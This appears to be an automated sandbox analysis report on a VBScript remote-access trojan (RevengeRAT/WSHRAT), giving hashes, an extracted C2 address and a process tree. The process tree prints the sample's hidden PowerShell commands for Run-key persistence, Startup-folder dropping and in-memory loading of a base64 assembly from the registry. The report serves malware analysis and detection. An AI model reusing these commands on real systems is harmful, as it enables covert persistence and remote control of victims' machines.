Overview

overview

10

Static

static

1

e3516f50c3...18.vbs

windows7-x64

10

e3516f50c3...18.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-09-2024 20:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs

  • Size

    155KB

  • MD5

    e3516f50c3eec802132c17e8250a82c5

  • SHA1

    3a1ec1501f21809f34cdbb6dccb662de26e96791

  • SHA256

    3d039a276556af992957c235fbdb216e79d1cf95787cab0e98f86158d4e34630

  • SHA512

    3c972ec1612ab8ce7fb2b2e76bedd0d3a1e52afab8438b88aef29628b5c94260dc52219dcadc0076c4c9f0103fa4c9d0454dddb58d7f80e400f917d272e2999d

  • SSDEEP

    3072:pjnXcHK4l+/Ms3p/kCP7BQdYj1DFi63iMS7iW6pKA8pCFt/W5EujzIkK8XsO7IeF:tp4liMs3p/kCP7BQd01DFi63iMS7iW6S

Score
10/10
revengeratwshratexecutionpersistencestealertrojan

Malware Config

Extracted

Family

revengerat

Mutex

Extracted

Family

wshrat

C2

http://pluginsrv2.duckdns.org:8899

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • RevengeRat Executable 1 IoCs
    stealer
  • Blocklisted process makes network request 32 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TYkxdUNRwA.vbs"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      PID:2564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'));wscript 'C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\system32\wscript.exe
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Windows\System32\wscript.exe
          "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TYkxdUNRwA.vbs"
          4⤵
            PID:2328
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs' -PropertyType String -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs'))"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1508

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      3c6e140abda30bacd864a1b1b5c4d551

      SHA1

      4e73833197d722216f3e7261906b6149fbb3bf8e

      SHA256

      50ded95744adf800a3930ae360a1f322843efaebbfb926447663e805fafd61f2

      SHA512

      1a1aee639dbaeabf5dcc290b2ca20be3282b89c4a06a85f525cbd27113398f997a08f6dae2dc74075e0cb06070b0d43f816d16c9195f3c45f79bf3f59ab5db13

      Download Submit

    • C:\Users\Admin\AppData\Roaming\TYkxdUNRwA.vbs
      Filesize

      38KB

      MD5

      c0b5796adf455943dd775724c9764e54

      SHA1

      2b00d998feb0aa61a2606aecf0a6a947195438d7

      SHA256

      e388aca790fbb89713c272dcbbf3a892088cd622004ef77a05018dbb28557859

      SHA512

      968ae0524f7a3dc53b9331c1065f6f473333424c4a07e56797c05c2692deae4733e3e8b4af1db75c4fb27dd5b7015552d17385c6ab2dec9b7a14224524d4d568

      Download Submit

    • C:\Users\Admin\AppData\Roaming\e3516f50c3eec802132c17e8250a82c5_JaffaCakes118.vbs
      Filesize

      155KB

      MD5

      e3516f50c3eec802132c17e8250a82c5

      SHA1

      3a1ec1501f21809f34cdbb6dccb662de26e96791

      SHA256

      3d039a276556af992957c235fbdb216e79d1cf95787cab0e98f86158d4e34630

      SHA512

      3c972ec1612ab8ce7fb2b2e76bedd0d3a1e52afab8438b88aef29628b5c94260dc52219dcadc0076c4c9f0103fa4c9d0454dddb58d7f80e400f917d272e2999d

      Download Submit

    • memory/1508-28-0x000000001B7D0000-0x000000001B7D8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2660-8-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2660-9-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB

      Download